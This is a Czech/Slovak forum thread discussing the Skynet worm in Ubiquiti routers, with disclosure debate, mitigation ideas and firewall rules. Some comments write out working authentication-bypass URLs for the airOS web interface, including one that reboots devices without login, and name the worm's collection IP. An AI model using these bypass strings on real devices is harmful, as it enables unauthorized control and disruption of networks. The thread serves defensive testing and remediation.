Internet Info, s.r.o. Lupa Měšec Podnikatel Root Zdroják DigiZone Slunečnice Vitalia TopDrive KupDnes Navrcholu NovýTarif Dobrý web Weblogy Woko Jagg Computer.cz SK: MojeLinky

Hlavní navigace

Názory k článku
Virus v bezdrátových routerech - Skynet

M@v
M@v (neregistrovaný) 91.192.32.---
19. 12. 2011 1:45 Nový

Děkuji a "děkuji" za článek

celé vlákno

Děkuji za více než užitečnou informaci - opět ukázka jedné hyper super klikací obezličky, který v téhle podobě podle mě nemá na žádném zařízení co dělat.

Nicméně zveřejněním postupu manuální instalace viru byla de-facto zveřejněna informace o zranitelné cestě přímo v článku. Nešlo napsat alespoň "najděte si cestu v archivu" nebo něco podobného? Docela mě děsí až si nějaké kiddie dá dvě a dvě dohromady a začne instalovat bez konzole :-(

Tomáš

Kiddie
Kiddie (neregistrovaný) ---.dip0.t-ipconnect.de
19. 12. 2011 2:45 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Najprv som myslel ze 'Skynet, tak to bude nejaky PR clanok' takze som len tak zaskroloval dole a az po precitani tohoto nazoru zistujem ze... ehm zaujimave, dakujem za typ :)

Jenda
Jenda (neregistrovaný) ---.net.upcbroadband.cz
19. 12. 2011 3:47 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Pokud vývojáři zmíněného SW o chybě už vědí, nevidím v tom, že se jede na full disclosure, problém.

Nicméně způsob odstraňování v článku je nešťastný, protože nectí zásadu „jednou rootem, navždy rootem“. Může se tedy stát, že útočník bude mít k systému přístup pořád. Pomohla by jen úplná reinstalace.

pixall
pixall (neregistrovaný) ---.alternet.sk
19. 12. 2011 7:11 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

UBNT zariadenia bezia na read-only filesysteme (neda sa remountovat na read/write). Virus sa uklada iba do oblasti kde je konfiguracia, do adresra ktory je urceny pre uzivatelske skripty. Reset konfiguracie na likvidaciu staci. Ak ovsem utocnik neflashne medzicasom do zaiadenia svoj zmeneny firmware. V kazdom pripade reflash firmware a vymazanie konfiguracie (aspon adresarov kde sa virus uklada) bude 100% v pohode. Do read-only filesystemu (squashfs) je principialne dost velky problem nieco zapisat.

Horsie je to ze diera je zverejnena a ze dostat sa do cudzieho zariadenia je trivialne.

K clanku by som opdotkol len tolko ze navrhovane opravy (doplnenie airos.deny) nie su ucinne (treba zakazat vsetky vynimky, potom ale uz nejde web rozhranie vobec). Bud si treba vypnut web rozhranie uplbne alebo neexistuje (bez rekompilacie firmware a modulu mod_airos) ziadna oprava alebo uprava ktora by to riesila.

Martin Kratochvíl aura:90
19. 12. 2011 7:31 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Uváděná konfigurace /usr.../lighttpd­.conf řeší všechny případy podvržení url,
akorát ji musíte dostat do squashfs (vlastní firmware), nemusíte pak řešit nahrání pomocných věcí v /etc/persistent

Jinou variantou je, nahrát lighttpd.conf do /etc/persistent a přinutit (konfigurace /etc/lighttpd.conf) lighttpd aby používalo konfigurační soubor v /etc/persistent.. Jenže to znamená úpravu rc.poststart a kill webserveru po startu. To mi přišlo velmi komplikované, tak jsem to do článku neuváděl a raději uvedl, že je to lepší dát do upraveného firmwaru.

pixall
pixall (neregistrovaný) ---.alternet.sk
19. 12. 2011 7:39 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Kym je v airos.allow napisane "/login.cgi", je mozne pridanim tohto stringu do URL vyvolat zelane (chybove) spravanie. A v momente odstranenia "/login.cgi" z airos.allow (alebo po jeho pridani do airos.deny) uz sice chyba nie je pritomna, ale do weboveho rozhrania sa viac neda prihlasit.

Rekompilaciou sa da odstranit admin.cgi co moze trochu pomoct, ale fakt len trochu. Bez opravy mod_airos (parsovania URL) sa (imho) neda odstranit stav, ze bez hesla sa da citat (a menit) konfiguracia zariadenia.

Ste mi tym clankom pekne posrali vianoce, smradi. Co oci nevidia, to srdce neboli...

Martin Kratochvíl aura:90
19. 12. 2011 7:48 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Věřte tomu a vyzkoušejte si, že tak jak je to v souboru napsáno, tak to funguje a není to zneužitelné. Teď to ověřuji na testovacím kousku, jestli chcete napište mi email, pošlu vám můj fw, který mám zkompilovaný a můžete se zkusit do toho nabourat (což se mi nepodařilo)

pixall
pixall (neregistrovaný) ---.alternet.sk
19. 12. 2011 8:03 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

ip.ad.re.sa/in­dex.cgi/login­.cgi
?

Martin Kratochvíl aura:90
19. 12. 2011 8:04 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Error 403 - Forbidden
s upraveným konfigem tak jak je v článku :-)

pixall
pixall (neregistrovaný) ---.alternet.sk
19. 12. 2011 8:28 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Tak som sa trochu pohral s konfigurakmi a tak sa zda ze mate pravdu, mohlo by to ist oklamat aj cez konfigy.

mouse
mouse (neregistrovaný) 82.117.156.---
19. 12. 2011 15:32 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Dobrý den, chtel jsem se zeptat jestli byste me neposlal Vas upraveny firmware.Dekuji d_stejskal@sez­nam.cz

Martin Kratochvíl aura:90
19. 12. 2011 15:58 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

máte to v emailu

Redy
Redy (neregistrovaný) ---.pra.giganet.cz
19. 12. 2011 16:32 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Dobrý den, také poprosím o Váš FW na e-mail redy@atlas.cz. Předem děkuji.

Liquid
Liquid (neregistrovaný) 2a01:5f0:100e:----:----:----:----:----
19. 12. 2011 17:20 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Mohl bych Vás také požádat o upravený firmware na mail liquid zavinac liquid tečka cz?

lukic
lukic (neregistrovaný) ---.mag-net.sk
19. 12. 2011 17:49 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

skuste ale napr:

http://ip.ad.re.sa/admin.cgi/uplnachujovina/login.cgi

a toto uz otvori.. zabezpecenie bud treba doriesit dokompilovanim matchnutia na zaciatok a koniec stringu alebo vypnutim prepisu od UBNT.

Martin Kratochvíl aura:90
19. 12. 2011 18:23 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

bohužel máte pravdu, jdu upravit svůj fw a znovu aktualizovat

lukic
lukic (neregistrovaný) ---.mag-net.sk
19. 12. 2011 18:45 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

mozem vediet ako?

MilanK
MilanK (neregistrovaný) ---.din.cz
19. 12. 2011 20:10 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Trochu jsem se na to podíval: musí se upravit lighttpd, přesněji modul mod_airos.c:

Ve funkci mod_airos_uri_han­dler() se sice správně testuje con->uri.path (přesněji se to testuje v uri_is_in_list()), jenže v době testování obsahuje uri.path ještě "path info".

To "path info" se detekuje/odstraňuje až později (response.c:699), takže uri.path bez něj vidí až mod_airos_subre­quest_start(). Teprve v ní by měly být volány testy deny/allow. (Název deny/allow je trochu matoucí, protože "deny" znamená odmítnout úplně, kdežto "allow" znamená poslat bez autorizace - to, co není ani v "deny", ani v "allow" posílá jen autorizovaným uživatelům).

Ještě by se slušelo dát do uri_is_in_list() výjimku, že pokud testovaný vzorek začíná lomítkem, musí být shoda v celé délce.

Ubiquiti na tom prý pracuje, pravděpodobně dojdou k podobnému závěru, tak jsem línej přetahovat ty testy z mod_airos_uri_han­dler do mod_airos_subre­quest_start, protože to stejně udělají za chvilku také... Proti zveřejněné verzi "skynet" stačí ochrana popsaná v článku, tak se snad dočkáme opravy z USA dříve, než přijde skynet2 ;-)

xp
xp (neregistrovaný) ---.ido.cz
20. 12. 2011 6:53 Nový

opraveno

celé vlákno

Na ubnt uz je ke stazeni opreveny fw.

Franta Kučera aura:80
19. 12. 2011 19:57 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Ad „opět ukázka jedné hyper super klikací obezličky, který v téhle podobě podle mě nemá na žádném zařízení co dělat“

Více méně souhlas – problém je jednak v tom, že se nepoužívají standardní a vyzkoušené prostředky/fra­meworky, ale nějaký vlastní, evidentně nedostatečně otestovaný a zkontrolovaný bastl, a jednak v tom, že je to malé zařízení, je potřeba extrémně šetřit zdroji → je tu vyšší pravděpodobnost, že dojde k chybě.

Na druhou stranu, uživatelé těchto zařízení jsou často lamy a nějaké uživatelsky přívětivé rozhraní je pro ně nutnost – nejsou schopní psát něco do příkazové řádky, bohužel.

Napadají mne dvě možnosti, jak by se to dalo zlepšit:

1) Použít HTTP autentizaci – to je standardní a vyzkoušené řešení a v implementaci by neměly být takové trapné chyby, jako předvedli autoři té formulářové autentizace. Webová aplikace by pak mohla být i děravá, ale tolik by to nevadilo, protože přes HTTP autentizaci by se k ní dostal jen ten, kdo by znal jméno a heslo.

2) V zařízení mít jen to nejnutnější, žádný webový ksindl, jen SSH. A udělat nějakou pěknou a přívětivou aplikaci, která by běžela u uživatele na desktopu, připojovala se přes SSH a pouštěla na dálku příkazy.

Karel
Karel (neregistrovaný) 93.90.162.---
20. 12. 2011 10:53 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

Ad 2 - to je cesta do pekla. Obyčejný uživatel by to vnímal tak, že musí do PC instalovat "ovladače pro tu krabičku". A bez nich že to ani nezkonfiguruje. Pak by se začala řešit kompatibilita s různými OS a po nějaké době by tu byli nešťastní uživatelé, kterým "ty ovladače" nějak nefungují a skupina IT profesionálů, kteří si budou ťukat na hlavu proč vůbec někoho napadlo dělat standardní konfiguraci !routeru! jako samostatnou aplikaci, navíc když je tu zažitý postup - konfigurace přes web. Za pár měsíců by si už málokdo vzpomněl, že to celé začalo jen tím, že autoři neuměli napsat bezpěčný webový interface.

Jinak já osobně webové rozhraní preferuji. Jsem na něj zvyklý u routerů, u HW print serverů, tiskáren, IP kamer, vlastně snad všech těch krabiček. Jsou jich tu kolem desítky (možná i lehce přes stovečku) a já se nemusím nazpaměť učit jak se která konfiguruje. Ověřit stav tiskárny nebo routeru zvládnu z jakéhokoliv PC s prohlížečem ať už na něm běží OS jaký chce. Jediné co musím vědět je IP adresa, zbytek je intuitivní nebo "až to uvidím, tak si vzpomenu".

milo
milo (neregistrovaný) 192.128.254.---
20. 12. 2011 13:03 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

hm, poznas mikrotik a ich winbox?

Pavel Šimerda aura:63
21. 12. 2011 21:07 Nový

Re: Děkuji a "děkuji" za článek

celé vlákno

I ti už na to přišli a přenášejí kompletní Winbox do webového rozhraní. Nehledě na to, že málokdo používá winbox ke správě jednoho jediného zařízení.

Martin Kukal aura:77
19. 12. 2011 9:12 Nový

Je autorem viru cech ?

celé vlákno

Prochazel jsem scriptu viru a co nevidim 178.216.144.75 coz je ceska ip adresa.

Zkoumal jste nekdo jestli je ve vsech modifikacich viru tahle ip adresa ?

Aleš
Aleš (neregistrovaný) ---.42.broadband3.iol.cz
5. 1. 2012 21:28 Nový

Re: Je autorem viru cech ?

celé vlákno
Martin Kukal aura:77
19. 12. 2011 9:12 Nový

Je autorem viru cech ?

celé vlákno

Prochazel jsem scripty viru a co nevidim 178.216.144.75 coz je ceska ip adresa.

Zkoumal jste nekdo jestli je ve vsech modifikacich viru tahle ip adresa ?

Martin Kratochvíl aura:90
19. 12. 2011 9:40 Nový

Re: Je autorem viru cech ?

celé vlákno

Ceska ip někde u Jihlavy. Ještě se dá zjisti jméno tvůrce (zapoměl ho v taru :) - mc - "F3" na .tgz

sxc
sxc (neregistrovaný) 93.89.110.---
19. 12. 2011 13:44 Nový

Re: Je autorem viru cech ?

celé vlákno

Už jste to oznámil PČR? Tohle není sranda - tohle je narušení veřejné telekomunikační sítě a za se chodí sedět.

Trident
Trident (neregistrovaný) ---.tmcz.cz
19. 12. 2011 14:38 Nový

Re: Je autorem viru cech ?

celé vlákno

Bejvavalo;) A kdyztak to neni telekomunikacni sit, ale telekomunikacni zarizeni pripadne verejne prospesne zarizeni.
To by nekdo musel prekopnout nejakou preshranicni optiku nebo spoj Praha-Brno. Pro dotycneho by byl vetsi trest nahrada skody nez se hezky valet a nic nedelat.

Z verejne otevreneho portu by se mohl vykroutit a bylo by treba dokazat mu umysl. Coz neni tak jednoduche. Navic nekdo mohl sice vir udelat, ale nekdo jiny ho mohl vypustit.

Nemyslete si ze nekoho vytrhne par blbych lokalnich poskytovatelu. Tady se kope jen za velke hrace jako O2 nebo CRa. Je to smutne ale to je bohuzel realny stav v CR. Dotycny si musi spocitat zda-li se mu vyplati jit do sporu s CTU a mafii jmenem ceska justice.

hu
hu (neregistrovaný) 91.219.45.---
19. 12. 2011 14:54 Nový

Re: Je autorem viru cech ?

celé vlákno

Ja na zaklade vyse zmineneho paragrafu o "poskozeni a ohrozeni obecne prospesneho zarizeni" stravil noc na Pankraci (kde jsem byl mlacen teleskopem pres hlavu za vykriku "tady mate tu vasi demokracii" apod.) a nasledne sel malem sedet - za utrzeny sluchatko telefonniho automatu, co mi sezral dvacetikorunu. Takze zase pozor.

Harvie.CZ
Harvie.CZ (neregistrovaný) 2002:50f3:65--:----:----:----:----:----
22. 5. 2012 20:48 Nový

Re: Je autorem viru cech ?

celé vlákno

urcite se to stalo tobe? me to pripada spis jako znama scena z filmu "Acid House" :-D

sxc
sxc (neregistrovaný) 93.89.110.---
19. 12. 2011 15:02 Nový

Re: Je autorem viru cech ?

celé vlákno

Myslim, ze to je celkem zrejme. Navic root napomaha potencialnim utocnikum pomoci posledniho odstavce clanku.

§ 132 Obecně prospěšné zařízení
Obecně prospěšným zařízením se rozumí veřejné ochranné zařízení proti požáru, povodni nebo jiné živelní pohromě, obranné nebo ochranné zařízení proti leteckým a jiným podobným útokům nebo jejich následkům, ochranné zařízení proti úniku znečišťujících látek, zařízení energetické nebo vodárenské, podmořský kabel nebo podmořské potrubí, zařízení a sítě elektronických komunikací a koncová telekomunikační a rádiová zařízení, zařízení držitele poštovní licence, zařízení pro veřejnou dopravu, včetně součástí dráhy a drážních vozidel ve veřejné drážní dopravě a svislých zákazových nebo příkazových dopravních značek a dopravních značek upravujících přednost.

Definice, skutková podstata a sankce:

(1) Kdo úmyslně poškodí obecně prospěšné zařízení nebo ohrozí jeho provoz nebo využívání, bude potrestán odnětím svobody až na tři léta nebo zákazem činnosti.

(2) Odnětím svobody na jeden rok až šest let nebo peněžitým trestem bude pachatel potrestán,
a) zničí-li, odstraní-li nebo učiní-li neupotřebitelným obecně prospěšné zařízení,
b) způsobí-li činem uvedeným v odstavci 1 poruchu provozu obecně prospěšného zařízení, nebo
c) způsobí-li takovým činem značnou škodu.

(3) Odnětím svobody na dvě léta až osm let bude pachatel potrestán,
a) způsobí-li činem uvedeným v odstavci 1 nebo 2 písm. a) škodu velkého rozsahu, nebo
b) spáchá-li takový čin za stavu ohrožení státu nebo za válečného stavu.

Ondřej Caletka aura:96
19. 12. 2011 15:17 Nový

Re: Je autorem viru cech ?

celé vlákno

Kde je v citovaném odstavci to napomáhání?

Navíc článek, který virus popisuje a navrhuje způsob, jak se bránit rozhodně nikdo nemůže hodnotit jako napomáhání šíření viru.

Zdenek - aura:41
19. 12. 2011 22:33 Nový

Re: Je autorem viru cech ?

celé vlákno

No jistě, byl to narušitel. :)

Martin Stepanek
19. 12. 2011 20:04 Nový

Re: Je autorem viru cech ?

celé vlákno

Jo on to byl nějakej Kuba ...

Mirek
Mirek (neregistrovaný) ---.klfree.cz
20. 12. 2011 21:15 Nový

Re: Je autorem viru cech ?

celé vlákno

Na konci tohoto článku http://www.zive.cz/clanky/prolomili-jsme-se-do-cizi-wi-fi-site-video/sc-3-a-161340/default.aspx je pár zajímavých paragrafů, vhodných pro trestní stíhání

Martin Kratochvíl aura:90
19. 12. 2011 9:45 Nový

Re: Virus v bezdrátových routerech - Skynet

celé vlákno

Podle jména by to tedy mohl být čech, otázkou je zda ta ip je jeho, nebo je to jen kompromitovaný pc (nebo ubnt ?), který informace sbírá.

Vladimír Bílek aura:20
19. 12. 2011 9:47 Nový

NanoStation5 verze 4.0

celé vlákno

týká se to i NanoStation5 Loco verze 4.0?

Martin Kratochvíl aura:90
19. 12. 2011 9:50 Nový

Re: NanoStation5 verze 4.0

celé vlákno

ano, týká. Všechny zařízení od ubnt s firmware od výrobce ve verzi 3.6.1, 4.x, 5.x,

muf
muf (neregistrovaný) ---.anonymouse.org
19. 12. 2011 10:43 Nový

Nestačím se divit - to jste administrátoři?

celé vlákno

S prominutím, předem se omlouvám za následující slova:
Jen blb nechává Webové rozhraní routeru otevřené pánu Bohu do oken a komunikuje s ním přes port 80.
Případně jen blb používá jako provider zařízení, které cokoliv takového vyžaduje.

U běžného domácího uživatele se nedivím, u firmy, která poskytuje služby jsem šokován. Přímo si o takový "crack" říkáte...

Martin Kratochvíl aura:90
19. 12. 2011 10:52 Nový

Re: Nestačím se divit - to jste administrátoři?

celé vlákno

Webové rozhraní wifi zařízení nemáme z venku otevřené (standartně), ale nepodchytí případy, kdy zákazník trvá na veřejné ip adrese a rozhraní nanostationa je (může být) dostupné. Nechci teď tvrdit že vnitřní a vnější síť (NAT) je samospásné.

Jenže jakmile se skynet (nějak) dostane do zařízení, pustí sken a infikuje zevnitř (včetně lokální sítě atd..), navíc to infikování nemuselo přijít nutně z venku ale klidně zevnitř (z pc apod), i když pravděpodobnější je ta varianta přes veřejnou ip.

Trident
Trident (neregistrovaný) ---.tmcz.cz
19. 12. 2011 12:51 Nový

Re: Nestačím se divit - to jste administrátoři?

celé vlákno

Nema zakaznik pak svoji verejnou IP ve sve siti a ne na nanostationu? Jaktoze nemate separatni management sit s neverejnym rozsahem?
Kdyz uz mate takovou konfiguraci tak jaktoze nemate webserver bindnuty jen na adresu ve vasem neverejnem rozsahu?

Trident
Trident (neregistrovaný) ---.tmcz.cz
19. 12. 2011 13:30 Nový

Re: Nestačím se divit - to jste administrátoři?

celé vlákno

I pres komentare nize nemohu nez souhlasit. Nechat takhle otevreny port do sveta kdyz denne vas scannuji hromady skriptu je krajne nezodpovedne. Casovana bomba ktera prave vybouchla. V siti kterou ve svem volnem case udrzuji mame treba specialni rozsah pro management. Clenove sdruzeni jsou od management site jeste oddeleni VLANy. A to nejsme komercni ISP.

orso
orso (neregistrovaný) ---.rainside.sk
19. 12. 2011 10:53 Nový

akurat si chystam novy firmware.....

celé vlákno

Pocujte a nestacilo by do airos.deny = pridat ".cgi/" ????

Martin Kratochvíl aura:90
19. 12. 2011 11:06 Nový

Re: akurat si chystam novy firmware.....

celé vlákno

vyzkouším, dám vědět. Nebo zkuste a dejte vědět.

Martin Kratochvíl aura:90
19. 12. 2011 11:10 Nový

Re: akurat si chystam novy firmware.....

celé vlákno

pokud je to přidáno pomocí rc.poststart do /etc/lighttpd.conf
tak to nefunguje.

orso
orso (neregistrovaný) ---.rainside.sk
19. 12. 2011 11:44 Nový

Re: akurat si chystam novy firmware.....

celé vlákno

prosim otestovat , ja budem mat testovaci hw k dispozicii az vecer

http://www.orso.sk/nanostationm5/XM.v5.3.3.sdk.9634.111219.1130.bin

Martin Kratochvíl aura:90
19. 12. 2011 11:51 Nový

Re: akurat si chystam novy firmware.....

celé vlákno

sice jste překopal soubor /admin.cgi , a rozloučil se se skynetem :)

ale na URL to zabezpečené nemáte. Například se mi podařilo zařízení s vaším firmwarem restartovat pomocí
http://192.168.1.22/reboot.cgi/.gif

orso
orso (neregistrovaný) ---.rainside.sk
19. 12. 2011 12:07 Nový

Re: akurat si chystam novy firmware.....

celé vlákno

tu je uz deny podla roota a pridanych este par direktiv, ako jedine normalne riesenie sa ukazuje asi fakt uprava lighttpd , resp. pridanie podpory reg. vyrazov
ale to bude na dlhsie
http://www.orso.sk/nanostationm5/XM.v5.3.3.sdk.9634.111219.1204.bin

Martin Kratochvíl aura:90
19. 12. 2011 12:21 Nový

Re: akurat si chystam novy firmware.....

celé vlákno

Dle jednoduchého ověření tohle vypadá že je ok.

Akorát upozorňuji, že pokud bude skynet v zařízení před nahráním firmware, tak tam zůstane a bude se šířit dál.

orso
orso (neregistrovaný) ---.rainside.sk
19. 12. 2011 12:21 Nový

Re: akurat si chystam novy firmware.....

celé vlákno

nestacilo....

Ares
Ares (neregistrovaný) ---.klfree.cz
19. 12. 2011 11:50 Nový

vlastník

celé vlákno

Zmíněná veřejná IP je registrována na tohoto poskytovatele http://www.cninet.cz/ . Nezkoušel ho už někdo kontaktovat, aby ji například zablokoval? Právě ted je stále dostupná ...

Kimot
Kimot (neregistrovaný) ---.numeri.cz
19. 12. 2011 11:57 Nový

Re: vlastník

celé vlákno

Vlastnika jsem kontaktoval uvidime co odpovi

ares
ares (neregistrovaný) ---.ares.klfree.cz
19. 12. 2011 12:10 Nový

Re: vlastník

celé vlákno

To jsem celkem zvědav ... napíšu mu asi taky ...

Toto je skoro na trestní oznámení, vzhledem k povaze dat, která virus sbírá a odesílá. Máme tím napadenu sít a zrovna zkoumáme jak moc, přesto , že nemáme zařízení dostupná z veřejného internetu, někdo to musel dovnitř zavléct ... :/

lubie
lubie (neregistrovaný) ---.net.upcbroadband.cz
19. 12. 2011 19:44 Nový

Re: vlastník

celé vlákno

kontaktoval jsem ho telefonicky behem uz po obede. adresu jsme dohledali na nejake zarizeni (tusim, ze take ubnt), na ktere se aktualne neda dostat -> pravdepodobne jej autor jen zneuzil k dalsimu sireni.

pristup na tuto adresu poskytovatel okamzite zablokoval

magy
magy (neregistrovaný) ---.radiolan.sk
19. 12. 2011 12:18 Nový

hmmm

celé vlákno

kolega asi hodinku daval uvedeny script do pouzitelnej podoby. zatial to funguje len proti skynetu. rovnako dobre proti nemu vsak funguje aj zmena http portu.

ares
ares (neregistrovaný) ---.klfree.cz
19. 12. 2011 12:44 Nový

forum ubiquiti

celé vlákno

Tak se odkaz na tento článek objevil na ofic. foru ubnt a právě ted celé vlákno o 6 stranách zmizelo .... :D

magy
magy (neregistrovaný) ---.radiolan.sk
19. 12. 2011 12:46 Nový

APEL!

celé vlákno

apelujem na prevadzkovatela servera root.cz aby uvedeny clanok okamzite zmazal.
propagacia uvedenej bezpecnostnej diery moze sposobit poskytovatelom internetu nedozierne skody, kedze vyuzitim tejto diery je mozne zariadenia nenavratne poskodit.

DgBd aura:43
19. 12. 2011 12:57 Nový

Re: APEL!

celé vlákno

jenže ten skynet už existuje a působí škody. Takže váš příspěvek je mimo. A alespoň se o tom ví a mohou se podle toho postižení zařídit.

magy
magy (neregistrovaný) ---.radiolan.sk
19. 12. 2011 13:07 Nový

Re: APEL!

celé vlákno

fix na skynet je proste zmena portu webservera na iny ako 80.
vacsi problem ako hrackarsky virus skynet je bezpecnostna diera ktoru vyuziva, a ktoru je mozne vyuzit na nenavratne poskodenie zariadeni!

JiUch
JiUch (neregistrovaný) ---.krasl.com
19. 12. 2011 13:02 Nový

Re: APEL!

celé vlákno

To je ale blbost. Ten virus uz se siri, takze lidi musi vedet, jak se proti nemu branit. A i kdybys to ted smazal tak uz je stejne pozde, protoze to je v Google cache a hodne lidi to stejne cetlo.

Trident
Trident (neregistrovaný) ---.tmcz.cz
19. 12. 2011 13:06 Nový

Re: APEL!

celé vlákno

1. Nespadate to jurisdikce CR
2. Sirite poplasnou zpravu coz je podle naseho i vaseho zakoniku trestne
3. Neoznameni trestneho cinu je trestne podle naseho i vaseho zakoniku
4. Pokud se cela vec zataji, tak prave ze vzniknou nedozirne skody. V minulosti muzete najit dost takovych prikladu.

magy
magy (neregistrovaný) ---.radiolan.sk
19. 12. 2011 13:16 Nový

Re: APEL!

celé vlákno

aj tak si myslim, ze by tento clanok mal byt zmazany az do doby ked UBNT vyda na to patch.
momentalne neexistuje jednoduchy fix na tuto bezpecnostnu dieru, kedze cez webrozhranie UBNT zariadeni sa neda vypnut webserver, zariadenia UBNT nepodporuju filtering cez iptables.
zatial ako pouzitelne riesenie sa nam javi zmena kofiguracneho suboru webservera do takej podoby aby sa po restarte nespustil, este to musime vsak otestovat.

jas
jas (neregistrovaný) 212.208.54.---
19. 12. 2011 13:29 Nový

Re: APEL!

celé vlákno

V clanku jako takovem problem neni nejvetsi riziko je v poslednim odstavci pro "experimentatory", kdy si nejaky vseumel muze stahnout samotny virus v taru a ma tam i prehledny navod jak jej nainstalovat. Takze timhle zpusobem nejspis nekdo mohl nakazil klfree zevnitr. Doporucoval bych ROOTu odkaz na tento soubor z clanku odstranit, aby jej kterakoli lama nemohla jednoduse rozsirit do dalsich "uzavrenych" zatim neinfikovanych siti!

magy
magy (neregistrovaný) ---.radiolan.sk
19. 12. 2011 13:54 Nový

Re: APEL!

celé vlákno

tak nakoniec to co som pisal o iptables je hlupost, zariadenia sa daju jednoducho zabezpecit pomocou iptables/ebtables. odporucam to kazdemu kto pouziva UBNT zariadenia

No comment99
No comment99 (neregistrovaný) ---.banicne.sk
19. 12. 2011 14:13 Nový

Re: APEL!

celé vlákno

Ja nemam slov.
To su ale curaci, v tom UBNT. Da sa im vediet dva tyzdne doperdu. Neriesia to a ked sa to prevali, tak vymazu oficialne vlakno suport UBNT stranky. No comment !

Trident
Trident (neregistrovaný) ---.tmcz.cz
19. 12. 2011 15:03 Nový

Re: APEL!

celé vlákno

Chovaji se tedy uz podobne jako velci hraci na trhu;) Asi jim stouplo sebevedomi.

lukic
lukic (neregistrovaný) ---.mag-net.sk
20. 12. 2011 13:40 Nový

Re: APEL!

celé vlákno

obhajovali sa, ze ten mail im zadrzal spam/virus filter..

magy
magy (neregistrovaný) ---.radiolan.sk
19. 12. 2011 14:20 Nový

Re: APEL!

celé vlákno

rad by som prispel do diskusie realnym riesenim.
pomocou UBNT AirControl je mozne nasledovny script spustit hromadne na viacerych zariadeniach:

#verzia pre bridge-mode
ebtables -A INPUT -p IPv4 --ip-src management.ip­.adresa --ip-protocol tcp --ip-destination-port 80 -j ACCEPT
ebtables -A INPUT -p IPv4 --ip-protocol tcp --ip-destination-port 80 -j DROP
echo "ebtables -A INPUT -p IPv4 --ip-src management.ip­.adresa --ip-protocol tcp --ip-destination-port 80 -j ACCEPT" >> /etc/persisten­t/rc.poststart
echo "ebtables -A INPUT -p IPv4 --ip-protocol tcp --ip-destination-port 80 -j DROP" >> /etc/persisten­t/rc.poststart
chmod +x /etc/persisten­t/rc.poststart
cfgmtd -w -p /etc/


#verzia pre router mode
iptables -A INPUT -p tcp -s management.ip­.adersa --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
echo "iptables -A INPUT -p tcp -s management.ip­.adresa --dport 80 -j ACCEPT" >> /etc/persisten­t/rc.poststart
echo "iptables -A INPUT -p tcp --dport 80 -j DROP" >> /etc/persisten­t/rc.poststart
chmod +x /etc/persisten­t/rc.poststart
cfgmtd -w -p /etc/

CLAn-X
CLAn-X (neregistrovaný) ---.pra.giganet.cz
19. 12. 2011 17:21 Nový

Re: APEL!

celé vlákno

super funguje skvele reseni
CLAn

Martin Stepanek
19. 12. 2011 19:22 Nový

Re: APEL!

celé vlákno

Dík za jednoduchou a efektivní záplatu. To cfgmtd bych musel dlouho lovit v dokumentaci, resp. zapomněl rovnou.

P.S. To bude reklamací až to tam někteří P.T. čtenáři naflákají v opačném pořadí ... :-)

P.P.S Ta adresa 178.216.144.75 už je v téhle chvíli zaříznutá (alespoň z nix.cz). Nějaký dva routery na optonet.cz si jí mezi sebou upinkají do TTL.

7: nix.dialtelecom.cz (91.210.16.9) 10.175ms asymm 8
8: gw-optonet.dialte­lecom.cz (82.119.252.186) 21.599ms asymm 9
9: core.optonet.cz (78.156.128.2) 28.681ms asymm 10
10: net-102.optonet.cz (78.156.128.102) 12.963ms asymm 11
11: net-101.optonet.cz (78.156.128.101) 14.803ms asymm 10
12: net-102.optonet.cz (78.156.128.102) 12.116ms asymm 11
13: net-101.optonet.cz (78.156.128.101) 16.314ms asymm 10
14: net-102.optonet.cz (78.156.128.102) 15.925ms asymm 11
15: net-101.optonet.cz (78.156.128.101) 21.876ms asymm 10
16: net-102.optonet.cz (78.156.128.102) 17.665ms asymm 11

DgBd aura:43
19. 12. 2011 14:37 Nový

Re: APEL!

celé vlákno

ad 3. neoznámení trestného činu je trestné jenom u vyjmenovaných trestných činů jako vražda nebo vlastizrada. Pochybuju, že by ten skynet už někoho zavraždil.

Trident
Trident (neregistrovaný) ---.tmcz.cz
19. 12. 2011 15:00 Nový

Re: APEL!

celé vlákno

Tech vyjmenovanych trestnych cinu je tam pomerne dost.
Osobni informace jsou v tom zakone ale take. Ale zalezi uz jen na pravnicich jestli na to dokazi napasovat "projevy osobni povahy"
Dale bych se zameril na telekomunikacni tajemstvi,

karlos
karlos (neregistrovaný) ---.gw4.pvfree.net
19. 12. 2011 14:24 Nový

Terminátor

celé vlákno

Tak to vypadá že autor je fanda Terminátora. Tam skynet ovládl svět a ničil lidstvo. :-)
Jinak doufám že soudruzi v UBNT brzo vydají záplatu.

Radek Hladík
Radek Hladík (neregistrovaný) 194.213.222.---
19. 12. 2011 14:37 Nový

Re: Terminátor

celé vlákno

A sakra, to mi uniklo. Já jsem si říkal, že už jsem ten obrázek, co byl u článku, někde viděl... :-)

ares
ares (neregistrovaný) ---.klfree.cz
19. 12. 2011 14:35 Nový

IP ve scriptu je jen prostředník

celé vlákno

Kontaktovali jsme ISP kteremu patří IP ve scriptu a ten jí zablokobal. Už by se na ní nemělo jít vůbec dostat. S největší pravděpodobností jde ale také o někým napadené zařízení, které je zneužito jako prostředník.

jas
jas (neregistrovaný) 212.71.152.---
20. 12. 2011 10:53 Nový

Re: IP ve scriptu je jen prostředník

celé vlákno

Idealni by bylo dostat se primo k danemu zarizeni a zjistit co dela script drobe.cgi. Tam by mohlo byt pojitko na tvurce. Otazka je jestli tam nedal nejake samodestrukcni ochrany a na danem zarizeni uz treba nic neni. No to uz je prace asi pro policii, ktera ma ale jine starosti takze ....

martas
